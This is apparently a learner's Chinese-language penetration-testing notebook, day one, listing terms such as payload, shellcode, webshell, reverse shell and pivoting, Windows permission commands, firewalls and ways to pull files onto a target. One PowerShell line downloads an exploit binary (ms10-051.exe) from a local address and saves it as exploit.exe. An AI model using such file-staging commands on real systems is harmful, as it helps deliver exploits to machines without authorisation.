渗透笔记 （第一天 ）

 基础  操作系统和渗透名词 

渗透名词 

poc   概念验证 漏洞证明验证 

exp  利用   利用系统漏洞进行攻击动作    唯一性 

payload  有效载荷   在目标系统执行的代码和指令  （通道 ）

shellcode shell代码 payload的一种  建立正向和反向的名字   （漏洞载荷的代码）

wehshell    网页后门 

系统后门    软件后门    

木马病毒    远程控制 

病毒   破坏性程序    

反弹  权限返回到ip上

回显 

跳板 中介  a b c  a通过b搞c  b这就是跳板 

黑白盒测试     

黑   没有源代码  只要目标 

白   啥都有  有源代码 

社会工程学     对人的攻击 

撞库       社工库撞库 

att&ck         红蓝对抗框架  

案例    

按照案例  

服务器  server   liunx 

个人pc  win10 

mac 比较少 

常见命令  

windows和liunx的 

菜鸟    liunx教程  

csdn 上搜windows   

权限问题   

文件权限 服务权限 用户权限

文件权限    

这个文件权限是在权限用户中的 

用户权限

windows的 

可以在权限查看在控制面版

单个用户的权限 

windows中 拒绝优先  

第二种 

命令

net user   查看用户权限 

whoami   查看当前用户 

管理员权限 

普通用户 

访客用户   

 

组用户     

在组里设置的权限在组里有效 

>net localgroup    查看组 

也可以在控制面板看 

net localgroup Power Users   查看用户组 

net user 用户名  查看用户所属组 

防火墙权限 

windows官方自带 

liunx防火墙 

第三方防火墙    

出站 

出战  无所谓  

入站 

严格 

网站 https和http  直接入站和出战  一般防火墙上都允许  

内网的时候 和主机     看到的防火墙才是真的防火墙 

看防火墙 的应用 

waf   web应用防火墙  

宝塔    安全狗   第三方    这个是专属于web的 

技术 

文件上传和下载   无界面  

liunx   

Linux:wget curl python ruby perl java   环境 

网站   

forum.ywhack.com/bountytips.php?pentest    棱角   知识库  

演示

条件

搭建网站或者ftp  （自己搭建 ）

默认下载 

默认  

curl  wget

下载 

wget  网站路径    或者ip下载 

curl   网站路径 -o 保存名字  

windows的 

forum.ywhack.com/bountytips.php?download    windows的生成命令 

powershell.exe  -Command "Invoke-WebRequest -Uri http://127.0.0.1:8080/ms10-051.exe（地址文件） -OutFile exploit.exe"（导出名字 ）

dir  查看当前文件 

windows的执行 

powershell 

cmd

案例二   反弹shell作用---------有回显 

回显就是显示命令执行不执行成功 

交互式命令    

passwd   账户   改密码